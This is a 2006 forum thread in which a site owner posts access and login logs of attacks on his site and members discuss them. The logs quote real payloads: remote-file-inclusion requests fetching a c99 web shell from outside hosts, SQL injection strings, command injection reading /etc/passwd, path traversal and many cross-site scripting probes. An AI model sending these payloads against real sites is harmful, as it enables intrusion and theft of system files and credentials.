Page 1 of 2 12 LastLast
Results 1 to 10 of 11

Thread: Repeated hack attempts hacker in this forum ?

  1. 10-22-2006 #1
    ijk
    ijk is offline
    Join Date
    Apr 2005
    Posts
    340

    Default Repeated hack attempts hacker in this forum ?

    Repeated hack attempts on my site below. I think this hacker might be a member of this forum

    88.226.41.159 - - [22/Oct/2006:08:45:17 -0500] "GET /inc/design.inc.php?dir[inc]=http://hometown.aol.com/yarivgiladi/musa.php? HTTP/1.1" 200 40
    88.229.187.108 - - [22/Oct/2006:10:07:52 -0500] "GET /inc/design.inc.php?dir[inc]=http://hometown.aol.com/yarivgiladi/musa.php? HTTP/1.1" 200 40
    88.224.236.46 - - [22/Oct/2006:10:48:52 -0500] "GET /inc/design.inc.php?dir[inc]=http://www.dogubey.by.ru/c99.txt? HTTP/1.1" 200 40

    85.96.132.92 - - [22/Oct/2006:10:59:15 -0500] "GET /inc/design.inc.php?dir[inc]=http://hometown.aol.com/yarivgiladi/musa.php? HTTP/1.1" 200 40


    whats do the below lines mean
    Code:
    208.185.249.195 - - [22/Oct/2006:08:27:22 -0500] "GET /blog.php?uri=http://wwwwwwww/&branch=85&owner=8822 HTTP/1.0" 200 13243

208.185.249.195 - - [22/Oct/2006:07:43:14 -0500] "GET /gallery.php?category=32&albom=5&owner=http://wwwwwwww/ HTTP/1.0" 200 35491
    Last edited by ijk; 10-22-2006 at 10:49 AM.
    AE Version 4.0 IQ
    Reply With Quote Reply With Quote
  2. 10-22-2006 #2
    Prometheus
    Guest

    Default

    You can start by going to arin.net then do an nslookup etc etc and hunt them down...lol



    Todd
    Reply With Quote Reply With Quote
  3. 10-22-2006 #3
    ijk
    ijk is offline
    Join Date
    Apr 2005
    Posts
    340

    Default proxy

    using proxies so whatever whois info is there is not going to be much help.

    but they seems hell bent on a sunday evening on bringing my site down.
    AE Version 4.0 IQ
    Reply With Quote Reply With Quote
  4. 10-23-2006 #4
    Smoge
    Smoge is offline
    Administrator Smoge's Avatar
    Join Date
    Mar 2005
    Posts
    6,634
    Blog Entries
    5

    Default

    Quote Originally Posted by ijk
    Repeated hack attempts on my site below. I think this hacker might be a member of this forum
    I did some basic searches of the MMS userlog against those IP's - and did not find any usernames that look like they would be hackers - based on the list and the posts made by users, for example, in the 88. address space. And as you mentioned - the IPs shown in your logs could be proxied / faked anyways.

    Smoge
    ModMySite Administrator

    Problems? Questions? Need modifications or other help with your site?

    Open A Ticket , Send Us An Email Or Give Us A Telephone Call +1 518-632-4152.
    Reply With Quote Reply With Quote
  5. 10-23-2006 #5
    Smoge
    Smoge is offline
    Administrator Smoge's Avatar
    Join Date
    Mar 2005
    Posts
    6,634
    Blog Entries
    5

    Default

    Hmmm... there is perhaps one, mentioned by someone else by name - that is in that IP space, 88.229.XXX.XXX

    Smoge
    ModMySite Administrator

    Problems? Questions? Need modifications or other help with your site?

    Open A Ticket , Send Us An Email Or Give Us A Telephone Call +1 518-632-4152.
    Reply With Quote Reply With Quote
  6. 10-23-2006 #6
    ijk
    ijk is offline
    Join Date
    Apr 2005
    Posts
    340

    Default Sure

    Pretty sure there is one here if not more.

    More hack attempts.
    85.107.122.77 - - [23/Oct/2006:07:58:08 -0500] "GET //inc/design.inc.php?dir[inc]=http://www.korsans.by.ru/c99.txt? HTTP/1.1" 200 40
    88.229.206.183 - - [23/Oct/2006:06:49:32 -0500] "GET /inc/design.inc.php?dir[inc]=http://hometown.aol.com/yarivgiladi/musa.php? HTTP/1.1" 200 40
    AE Version 4.0 IQ
    Reply With Quote Reply With Quote
  7. 10-23-2006 #7
    ijk
    ijk is offline
    Join Date
    Apr 2005
    Posts
    340

    Default With love from russia

    Or was it From Russia with love

    Another attack, they seem to love me, what have I done wrong
    +----------------------+-----------------+---------------------+-----------------+------------+
    | Name | Password | Login_Time | IP | Action |
    +----------------------+-----------------+---------------------+-----------------+------------+
    | aaaaa' | 1 | 2006-10-23 09:41:22 | 83.237.21.23 | Failed |
    | admin | 'or 1=1/* | 2006-10-23 09:41:40 | 83.237.21.23 | Failed |
    | 'or 1=1/* | 'or 1=1/* | 2006-10-23 09:41:48 | 83.237.21.23 | Failed |
    | ; | 1 | 2006-10-23 09:42:03 | 83.237.21.23 | Failed |
    | 111-222-1933email@a | 111-222-1933ema | 2006-10-23 13:05:24 | 208.185.249.195 | Failed |
    | 111-222-1933email@a | 111-222-1933ema | 2006-10-23 13:05:24 | 208.185.249.195 | Failed |
    | 111-222-1933email@a | 111-222-1933ema | 2006-10-23 13:05:24 | 208.185.249.195 | Failed |
    | 111-222-1933email@a | 111-222-1933ema | 2006-10-23 13:05:24 | 208.185.249.195 | Failed |
    | 111-222-1933email@a | 111-222-1933ema | 2006-10-23 13:05:25 | 208.185.249.195 | Failed |
    | 111-222-1933email@a | 111-222-1933ema | 2006-10-23 13:05:25 | 208.185.249.195 | Failed |
    | 111-222-1933email@a | 111-222-1933ema | 2006-10-23 13:05:25 | 208.185.249.195 | Failed |
    | 111-222-1933email@a | 111-222-1933ema | 2006-10-23 13:05:25 | 208.185.249.195 | Failed |
    | 111-222-1933email@a | 111-222-1933ema | 2006-10-23 13:05:25 | 208.185.249.195 | Failed |
    | 111-222-1933email@a | 111-222-1933ema | 2006-10-23 13:05:25 | 208.185.249.195 | Failed |
    | 111-222-1933email@a | 111-222-1933ema | 2006-10-23 13:05:28 | 208.185.249.195 | Failed |
    | 111-222-1933email@a | 111-222-1933ema | 2006-10-23 13:05:28 | 208.185.249.195 | Failed |
    | 111-222-1933email@a | 111-222-1933ema | 2006-10-23 13:05:29 | 208.185.249.195 | Failed |
    | 111-222-1933email@a | 111-222-1933ema | 2006-10-23 13:05:29 | 208.185.249.195 | Failed |
    | 111-222-1933email@a | 111-222-1933ema | 2006-10-23 13:05:29 | 208.185.249.195 | Failed |
    | 111-222-1933email@a | 111-222-1933ema | 2006-10-23 13:05:29 | 208.185.249.195 | Failed |
    | 111-222-1933email@a | 111-222-1933ema | 2006-10-23 13:05:29 | 208.185.249.195 | Failed |
    | 111-222-1933email@a | 111-222-1933ema | 2006-10-23 13:05:29 | 208.185.249.195 | Failed |
    | | 'or 1=1/* | 'or 1=1/* | 2006-10-23 14:51:14 | 83.237.21.23 | Failed
    Code:
    83.237.21.23 - - [23/Oct/2006:16:38:15 -0500] "GET /admin/forwrite/ HTTP/1.0" 404 213
83.237.21.23 - - [23/Oct/2006:16:38:15 -0500] "GET /admin/cgi-bin/aglimpse HTTP/1.0" 404 220
83.237.21.23 - - [23/Oct/2006:16:38:15 -0500] "GET /admin/cgi-bin/test-cgi.tcl HTTP/1.0" 404 224
83.237.21.23 - - [23/Oct/2006:16:38:15 -0500] "GET /admin/webdata/ HTTP/1.0" 404 212
83.237.21.23 - - [23/Oct/2006:16:38:15 -0500] "GET /admin/parties.php HTTP/1.0" 404 215
83.237.21.23 - - [23/Oct/2006:16:38:15 -0500] "GET /admin/forwrite/ HTTP/1.0" 404 213
83.237.21.23 - - [23/Oct/2006:16:38:16 -0500] "GET /admin/cgi-bin/aglimpse HTTP/1.0" 404 220
83.237.21.23 - - [23/Oct/2006:16:38:16 -0500] "GET /admin/cgi-bin/test-cgi.tcl HTTP/1.0" 404 224
83.237.21.23 - - [23/Oct/2006:16:38:16 -0500] "GET /admin/webdata/  HTTP/1.0" 404 212
83.237.21.23 - - [23/Oct/2006:16:38:16 -0500] "GET /admin/parties.php HTTP/1.0" 404 215
83.237.21.23 - - [23/Oct/2006:16:38:16 -0500] "GET /admin/forwrite/ HTTP/1.0" 404 213
83.237.21.23 - - [23/Oct/2006:16:38:16 -0500] "GET /admin/cgi-bin/aglimpse HTTP/1.0" 404 220
83.237.21.23 - - [23/Oct/2006:16:38:16 -0500] "GET /admin/cgi-bin/test-cgi.tcl HTTP/1.0" 404 224
83.237.21.23 - - [23/Oct/2006:16:38:19 -0500] "GET /admin/webdb/ HTTP/1.0" 404 210
83.237.21.23 - - [23/Oct/2006:16:38:19 -0500] "GET /admin/parties.php HTTP/1.0" 404 215
83.237.21.23 - - [23/Oct/2006:16:38:19 -0500] "GET /admin/forwrite/ HTTP/1.0" 404 213
83.237.21.23 - - [23/Oct/2006:16:38:19 -0500] "GET /admin/cgi-bin/aglimpse HTTP/1.0" 404 220
83.237.21.23 - - [23/Oct/2006:16:38:19 -0500] "GET /admin/cgi-bin/test-cgi.tcl HTTP/1.0" 404 224
83.237.21.23 - - [23/Oct/2006:16:38:20 -0500] "GET /admin/WebDB/admin_/ HTTP/1.0" 404 217
83.237.21.23 - - [23/Oct/2006:16:38:20 -0500] "GET /admin/parties/ HTTP/1.0" 404 212
83.237.21.23 - - [23/Oct/2006:16:38:20 -0500] "GET /admin/forwrite/ HTTP/1.0" 404 213
83.237.21.23 - - [23/Oct/2006:16:38:20 -0500] "GET /admin/cgi-bin/aglimpse HTTP/1.0" 404 220
83.237.21.23 - - [23/Oct/2006:16:38:20 -0500] "GET /admin/cgi-bin/test-cgi.tcl HTTP/1.0" 404 224
83.237.21.23 - - [23/Oct/2006:16:38:20 -0500] "GET /admin/webdist.cgi HTTP/1.0" 404 215
83.237.21.23 - - [23/Oct/2006:16:38:20 -0500] "GET /admin/parties/ HTTP/1.0" 404 212
83.237.21.23 - - [23/Oct/2006:16:38:20 -0500] "GET /admin/forwrite/ HTTP/1.0" 404 213
83.237.21.23 - - [23/Oct/2006:16:38:21 -0500] "GET /favicon.ico HTTP/1.1" 404 209
83.237.21.23 - - [23/Oct/2006:16:38:23 -0500] "GET /admin/cgi-bin/aglimpse HTTP/1.0" 404 220
83.237.21.23 - - [23/Oct/2006:16:38:23 -0500] "GET /admin/cgi-bin/test-cgi/bin/etc/passwd HTTP/1.0" 404 235
83.237.21.23 - - [23/Oct/2006:16:38:23 -0500] "GET /admin/webdist.cgi HTTP/1.0" 404 215
83.237.21.23 - - [23/Oct/2006:16:38:23 -0500] "GET /admin/partner.php HTTP/1.0" 404 215
83.237.21.23 - - [23/Oct/2006:16:38:23 -0500] "GET /admin/forwrite/ HTTP/1.0" 404 213
83.237.21.23 - - [23/Oct/2006:16:38:24 -0500] "GET /admin/cgi-bin/aglimpse HTTP/1.0" 404 220
83.237.21.23 - - [23/Oct/2006:16:38:24 -0500] "GET /admin/cgibin/test-cgi?/help&0a/bin/cat%20/etc/passwd HTTP/1.0" 404 219
83.237.21.23 - - [23/Oct/2006:16:38:24 -0500] "GET /admin/webdist.cgi  HTTP/1.0" 404 215
83.237.21.23 - - [23/Oct/2006:16:38:24 -0500] "GET /admin/partner.php HTTP/1.0" 404 215
83.237.21.23 - - [23/Oct/2006:16:38:24 -0500] "GET /admin/forwrite/ HTTP/1.0" 404 213
83.237.21.23 - - [23/Oct/2006:16:38:24 -0500] "GET /admin/cgi-bin/aglimpse HTTP/1.0" 404 220
83.237.21.23 - - [23/Oct/2006:16:38:24 -0500] "GET /admin/cgi-bin/test-cgi?/help&0a/bin/cat%20/etc/passwd HTTP/1.0" 404 220
    Last edited by ijk; 10-23-2006 at 02:03 PM.
    AE Version 4.0 IQ
    Reply With Quote Reply With Quote
  8. 10-23-2006 #8
    ijk
    ijk is offline
    Join Date
    Apr 2005
    Posts
    340

    Default 1000 plus login attempts

    here are a selection of the choice few.
    Code:
    +------------+---------------------+-----------------+----------------------------------------------------
| ProfilesID | Timestamp           | IP              | Action                                                                             +------------+---------------------+-----------------+--------------------------------------------------                                                       |
|          0 | 2006-10-23 09:59:45 | 208.185.249.195 | No Such ID:|cat /etc/passwd                                                                          |
|          0 | 2006-10-23 10:00:26 | 208.185.249.195 | No Such ID:<script/xss src=http://testphp.acunetix.com/xss.js></script>                              |
|        111 | 2006-10-23 10:00:26 | 208.185.249.195 | No Such ID:111-222-1933email@address.com                                                             |
|          0 | 2006-10-23 10:00:26 | 208.185.249.195 | No Such ID:<body onload=alert(1369189505)>                                                           |                                                         |
|          0 | 2006-10-23 10:00:26 | 208.185.249.195 | No Such ID:<ScRiPt src=http://testphp.acunetix.com/xss.js></ScRiPt>                                  |
|        111 | 2006-10-23 10:00:25 | 208.185.249.195 | No Such ID:111-222-1933email@address.com                                                             |
|          0 | 2006-10-23 10:00:25 | 208.185.249.195 | No Such ID:<embed src="http://testphp.acunetix.com/xss.swf" type="application/x-shockwave-flash"/>   |
|        111 | 2006-10-23 10:00:25 | 208.185.249.195 | No Such ID:111-222-1933email@address.com                                                             |
|          0 | 2006-10-23 10:00:24 | 208.185.249.195 | No Such ID:<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaX |
|        111 | 2006-10-23 10:00:22 | 208.185.249.195 | No Such ID:111-222-1933email@address.com                                                             |
|          0 | 2006-10-23 10:00:22 | 208.185.249.195 | No Such ID:../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././boot.ini          |
|        111 | 2006-10-23 12:51:34 | 208.185.249.195 | No Such ID:111-222-1933email@address.com' and '1'='1                                                 |
|        111 | 2006-10-23 10:00:21 | 208.185.249.195 | No Such ID:111-222-1933email@address.com                                                             |
|          0 | 2006-10-23 10:00:21 | 208.185.249.195 | No Such ID:../..//../..//../..//../..//../..//../..//../..//../..//boot.ini                          |
|        111 | 2006-10-23 12:51:34 | 208.185.249.195 | No Such ID:111-222-1933email@address.com and 1=1                                                     |
|        111 | 2006-10-23 12:51:34 | 208.185.249.195 | No Such ID:111-222-1933email@address.com" and "1"="1                                                 |
|          0 | 2006-10-23 10:00:15 | 208.185.249.195 | No Such ID:../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd                        |                                                                                    |
|          0 | 2006-10-23 10:00:14 | 208.185.249.195 | No Such ID:../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd        |                                                                              |
|        111 | 2006-10-23 12:51:34 | 208.185.249.195 | No Such ID:111-222-1933email@address.com                                                             |
|          0 | 2006-10-23 10:00:48 | 208.185.249.195 | No Such ID:" onmouseover="alert(768694694)                                                           |
|        111 | 2006-10-23 12:51:34 | 208.185.249.195 | No Such ID:111-222-1933email@address.com                                                             |                                                       |                                                                                    |
|        111 | 2006-10-23 12:51:36 | 208.185.249.195 | No Such ID:111-222-1933email@address.com' and '1'='0                                                 |
|          0 | 2006-10-23 10:00:08 | 208.185.249.195 | No Such ID:/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini                                                   |                                                                                  |                                                        |
|        111 | 2006-10-23 12:51:37 | 208.185.249.195 | No Such ID:111-222-1933email@address.com" and "1"="0                                                 |
|          0 | 2006-10-23 10:00:07 | 208.185.249.195 | No Such ID:<META HTTP-EQUIV="refresh" CONTENT="0;url=JaVaScRiPt:alert(1672687259);">             |
|          0 | 2006-10-23 10:00:06 | 208.185.249.195 | No Such ID:<img dynsrc="JaVaScRiPt:alert(578451584);">                                               |
|          0 | 2006-10-23 10:02:20 | 208.185.249.195 | Empty Request                                                                                        |
|        111 | 2006-10-23 12:51:37 | 208.185.249.195 | No Such ID:111-222-1933email@address.com and 1=0                                                     |
|          0 | 2006-10-23 09:59:40 | 208.185.249.195 | No Such ID:\"                                                                                        |
|        111 | 2006-10-23 10:01:00 | 208.185.249.195 | No Such ID:111-222-1933email@address.com                                                             |
|          0 | 2006-10-23 10:00:06 | 208.185.249.195 | No Such ID:<FRAMESET><FRAME SRC="JaVaScRiPt:alert(454644269);"></FRAMESET>                       |
|          0 | 2006-10-23 10:02:03 | 208.185.249.195 | Empty Request                                                                                        |
|          0 | 2006-10-23 10:01:00 | 208.185.249.195 | No Such ID:</div><ScRiPt >alert(1364208317);</ScRiPt>                                              |
|          0 | 2006-10-23 10:02:03 | 208.185.249.195 | Empty Request                                                                                        |
|        111 | 2006-10-23 10:00:06 | 208.185.249.195 | No Such ID:111-222-1933email@address.com                                                             |
|        111 | 2006-10-23 12:51:39 | 208.185.249.195 | No Such ID:111-222-1933email@address.com                                                             |
|          0 | 2006-10-23 10:00:05 | 208.185.249.195 | No Such ID:<DIV STYLE="width:expression(alert(1647235810));">                                        |
|          0 | 2006-10-23 09:58:41 | 208.185.249.195 | No Such ID:</title><ScRiPt >alert(970056533);</ScRiPt>                                             |
|          0 | 2006-10-23 09:58:41 | 208.185.249.195 | No Such ID:>'><ScRiPt >alert(609245772);</ScRiPt>                                                  |
|        111 | 2006-10-23 10:00:05 | 208.185.249.195 | No Such ID:111-222-1933email@address.com                                                             |
|          0 | 2006-10-23 09:58:41 | 208.185.249.195 | No Such ID:<ScRiPt >alert(2017586137);</ScRiPt>                                                    |
|          0 | 2006-10-23 09:58:41 | 208.185.249.195 | No Such ID:>"><ScRiPt >alert(39459719);</ScRiPt>                                                   |                                             |
|          0 | 2006-10-23 09:58:41 | 208.185.249.195 | No Such ID:</textarea><ScRiPt >alert(1338389066);</ScRiPt>                                         |
|          0 | 2006-10-23 10:00:05 | 208.185.249.195 | No Such ID:<scrip<script>t>alert(189707231);</scrip</script>t>                                                                                               |
|          0 | 2006-10-23 09:58:49 | 208.185.249.195 | No Such ID: cat /etc/passwd                                                                   |                                                        |
|          0 | 2006-10-23 09:58:50 | 208.185.249.195 | No Such ID:`cat /etc/passwd`                                                                         |
|        111 | 2006-10-23 09:58:50 | 208.185.249.195 | No Such ID:111-222-1933email@address.com                                                             |                                         |
|          0 | 2006-10-23 09:58:50 | 208.185.249.195 | No Such ID:cat /etc/passwd                                                                           |
|          0 | 2006-10-23 09:58:51 | 208.185.249.195 | No Such ID: &cat /etc/passwd&                                                                        |                                                         |                                                                                     |
|          0 | 2006-10-23 09:58:54 | 208.185.249.195 | No Such ID:;cat /etc/passwd;                                                                         |
|          0 | 2006-10-23 10:00:00 | 208.185.249.195 | No Such ID:/./././././././boot.ini                                                                   |                                                             |
|        111 | 2006-10-23 09:58:54 | 208.185.249.195 | No Such ID:111-222-1933email@address.com                                                             |
|          0 | 2006-10-23 09:58:54 | 208.185.249.195 | No Such ID:&dir&                                                                                     |
|        111 | 2006-10-23 09:58:54 | 208.185.249.195 | No Such ID:111-222-1933email@address.com                                                             |
|          0 | 2006-10-23 10:00:00 | 208.185.249.195 | No Such ID:<!--#include file="C:\boot.ini"-->                                                        |                                                                 |
|        111 | 2006-10-23 09:59:59 | 208.185.249.195 | No Such ID:111-222-1933email@address.com                                                             |
|          0 | 2006-10-23 09:59:00 | 208.185.249.195 | No Such ID:../../../../../../../../boot.ini                                                          |
|        111 | 2006-10-23 09:59:01 | 208.185.249.195 | No Such ID:111-222-1933email@address.com                                                             |
|          0 | 2006-10-23 10:00:48 | 208.185.249.195 | No Such ID:<ScRiPt bad=">" src="http://testphp.acunetix.com/xss.js"></ScRiPt>                        |
|          0 | 2006-10-23 09:59:01 | 208.185.249.195 | No Such ID:../../../../../../../../boot.ini                                                          |
|        111 | 2006-10-23 10:00:47 | 208.185.249.195 | No Such ID:111-222-1933email@address.com                                                             |                                                        |
|        111 | 2006-10-23 09:59:56 | 208.185.249.195 | No Such ID:111-222-1933email@address.com                                                             |
|          0 | 2006-10-23 10:00:47 | 208.185.249.195 | No Such ID:%3CScRiPt%3Ealert(948317544);%3C/ScRiPt%3E                                                |
|        111 | 2006-10-23 10:00:47 | 208.185.249.195 | No Such ID:111-222-1933email@address.com                                                             |                                                                           |
|          0 | 2006-10-23 09:59:02 | 208.185.249.195 | No Such ID:../../../../../../../../boot.ini                                                          |
|        111 | 2006-10-23 09:59:03 | 208.185.249.195 | No Such ID:111-222-1933email@address.com                                                             |
|          0 | 2006-10-23 09:59:03 | 208.185.249.195 | No Such ID:../../../../../../../../boot.ini                                                          |                                                                                  |
|          0 | 2006-10-23 10:00:47 | 208.185.249.195 | No Such ID:<img src=http://testphp.acunetix.com/dot.gif onload=alert(903739978)>                     |
|          0 | 2006-10-23 09:59:03 | 208.185.249.195 | Empty Request                                                                                        |
|        111 | 2006-10-23 09:59:04 | 208.185.249.195 | No Such ID:111-222-1933email@address.com                                                             |                                                                                    |
|          0 | 2006-10-23 09:59:04 | 208.185.249.195 | No Such ID:../../../../../../../../etc/passwd                                                        |
|        111 | 2006-10-23 09:59:05 | 208.185.249.195 | No Such ID:111-222-1933email@address.com                                                             |
|        111 | 2006-10-23 09:59:05 | 208.185.249.195 | No Such ID:111-222-1933email@address.com                                                             |
|          0 | 2006-10-23 09:59:05 | 208.185.249.195 | No Such ID:../../../../../../../../etc/passwd                                                        |                                                      |
|          0 | 2006-10-23 09:59:06 | 208.185.249.195 | No Such ID:../../../../../../../../etc/passwd                                                        |
|        111 | 2006-10-23 09:59:06 | 208.185.249.195 | No Such ID:111-222-1933email@address.com                                                             |
|          0 | 2006-10-23 09:59:56 | 208.185.249.195 | No Such ID:..\..\..\..\..\..\..\..\etc/passwd                                                        |
|        111 | 2006-10-23 09:59:08 | 208.185.249.195 | No Such ID:111-222-1933email@address.com                                                             |
|          0 | 2006-10-23 09:59:08 | 208.185.249.195 | No Such ID:http://some-inexistent-website.com/s...with_long_name                    |
|          0 | 2006-10-23 09:59:09 | 208.185.249.195 | No Such ID:/some_inexistent_file_with_long_name                                                      |
|          0 | 2006-10-23 09:59:09 | 208.185.249.195 | No Such ID:http://testphp.acunetix.com/acunetix...nclusion_test?                                 |
|          0 | 2006-10-23 10:00:47 | 208.185.249.195 | No Such ID:' style='background:url(JaVaScRiPt:alert(1365535573))' invalidparam='                     |
|          0 | 2006-10-23 09:59:56 | 208.185.249.195 | No Such ID:/./././././././etc/passwd                                                                 |                                                          |
|          0 | 2006-10-23 09:59:55 | 208.185.249.195 | No Such ID:<!--#include file="/etc/passwd"-->                                                        |
|        111 | 2006-10-23 09:59:55 | 208.185.249.195 | No Such ID:111-222-1933email@address.com                                                             |
|          0 | 2006-10-23 09:59:13 | 208.185.249.195 | No Such ID:../../../../../../../../etc/passwd                                                        |
|          0 | 2006-10-23 09:59:55 | 208.185.249.195 | No Such ID:/etc/passwd                                                                               |
|        111 | 2006-10-23 09:59:54 | 208.185.249.195 | No Such ID:111-222-1933email@address.com                                                             |
|          0 | 2006-10-23 09:59:14 | 208.185.249.195 | No Such ID:SomeCustomInjectedHeader:injected_by_wvs                                                |
|          0 | 2006-10-23 09:59:54 | 208.185.249.195 | No Such ID:.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd                                                  |
|          0 | 2006-10-23 09:59:14 | 208.185.249.195 | No Such ID:member.php                                                                                |
|          0 | 2006-10-23 09:59:16 | 208.185.249.195 | No Such ID:http://www.acunetix-long-name-with-s...tent-host.com/                              |
|          0 | 2006-10-23 09:59:19 | 208.185.249.195 | No Such ID:printf(md5(acunetix_wvs_security_test));exit;//                                           |
|        111 | 2006-10-23 09:59:19 | 208.185.249.195 | No Such ID:111-222-1933email@address.com                                                             |
|          0 | 2006-10-23 09:59:19 | 208.185.249.195 | No Such ID:;printf(md5(acunetix_wvs_security_test));exit;//                                          |
|        111 | 2006-10-23 09:59:19 | 208.185.249.195 | No Such ID:111-222-1933email@address.com                                                             |
|          0 | 2006-10-23 09:59:20 | 208.185.249.195 | No Such ID:';printf(md5(acunetix_wvs_security_test));exit;//                                         |
|        111 | 2006-10-23 09:59:20 | 208.185.249.195 | No Such ID:111-222-1933email@address.com                                                             |
|          1 | 2006-10-23 09:59:20 | 208.185.249.195 | No Such ID:1;printf(md5(acunetix_wvs_security_test));exit;//                                         |                                                            |
|          0 | 2006-10-23 09:59:20 | 208.185.249.195 | No Such ID:";printf(md5(acunetix_wvs_security_test));exit;//                                         |
|        111 | 2006-10-23 09:59:21 | 208.185.249.195 | No Such ID:111-222-1933email@address.com                                                             |
|        111 | 2006-10-23 09:59:31 | 208.185.249.195 | No Such ID:111-222-1933email@address.com                                                             |
|          0 | 2006-10-23 09:59:34 | 208.185.249.195 | No Such ID:<meta http-equiv='Set-cookie' content='cookiename=cookievalue'>                           |
|          0 | 2006-10-23 09:59:35 | 208.185.249.195 | No Such ID:http://www.acunetix.com                                                                   |
|        111 | 2006-10-23 09:59:41 | 208.185.249.195 | No Such ID:111-222-1933email@address.com                                                             |
|          0 | 2006-10-23 09:59:37 | 208.185.249.195 | No Such ID:--><ScRiPt >alert(800115743);</ScRiPt>                                                  |
|          0 | 2006-10-23 09:59:38 | 208.185.249.195 | No Such ID:email@some<ScRiPt >alert(1422733602);</ScRiPt>domain.com                                |                                                                                  |
|          0 | 2006-10-23 09:59:39 | 208.185.249.195 | No Such ID:[img]JaVaScRiPt:alert(982156909);[/img]                                                   |
|          0 | 2006-10-23 09:59:39 | 208.185.249.195 | No Such ID:<img src="JaVaScRiPt:alert(32674496);">                                               |
|        111 | 2006-10-23 09:59:39 | 208.185.249.195 | No Such ID:111-222-1933email@address.com
    After all that not one successful login.

    Smoge has userlog been sanitized as these popups are a pain.

    But this would be a great advert for the userlog. God knows how many people are unware of attacks on their site. And if successful attempts were made would be full unaware. This is a must have mod.
    Last edited by ijk; 10-23-2006 at 01:14 PM.
    AE Version 4.0 IQ
    Reply With Quote Reply With Quote
  9. 10-26-2006 #9
    Smoge
    Smoge is offline
    Administrator Smoge's Avatar
    Join Date
    Mar 2005
    Posts
    6,634
    Blog Entries
    5

    Default

    Quote Originally Posted by ijk
    Smoge has userlog been sanitized as these popups are a pain.

    But this would be a great advert for the userlog. God knows how many people are unware of attacks on their site. And if successful attempts were made would be full unaware. This is a must have mod.
    Hi,

    Yes - we posted that fix here.

    Smoge
    ModMySite Administrator

    Problems? Questions? Need modifications or other help with your site?

    Open A Ticket , Send Us An Email Or Give Us A Telephone Call +1 518-632-4152.
    Reply With Quote Reply With Quote
  10. 10-27-2006 #10
    baris
    baris is offline
    Join Date
    Oct 2006
    Posts
    25

    Default

    ijk,

    It looks like You have been tested out with acunetix (a server security program that looks for the holes, open ports and other stuff that can give a hacker pretty good information about Your system)

    Shit happens
    Reply With Quote Reply With Quote
Page 1 of 2 12 LastLast
« Previous Thread | Next Thread »

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Similar Threads

  1. Looks like some Hacking attempts...
    By bigal0228 in forum General Issues, Comments, Questions
    Replies: 9
    Last Post: 10-15-2009, 08:34 PM
  2. Hire a Hack?
    By bzzrd2 in forum Open Talk
    Replies: 1
    Last Post: 04-15-2009, 06:18 PM
  3. hacker at it again design.inc.php
    By ijk in forum Security / Server Administration
    Replies: 0
    Last Post: 10-21-2006, 01:58 PM
  4. Hack Attempts
    By sillywabbit in forum Dolphin General Discussion v5.0 to v5.21
    Replies: 10
    Last Post: 09-01-2006, 09:48 AM
  5. Rate.Php - HAck Attempts?
    By Smoge in forum Security / Server Administration
    Replies: 1
    Last Post: 09-06-2005, 12:57 PM

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  

Forum Rules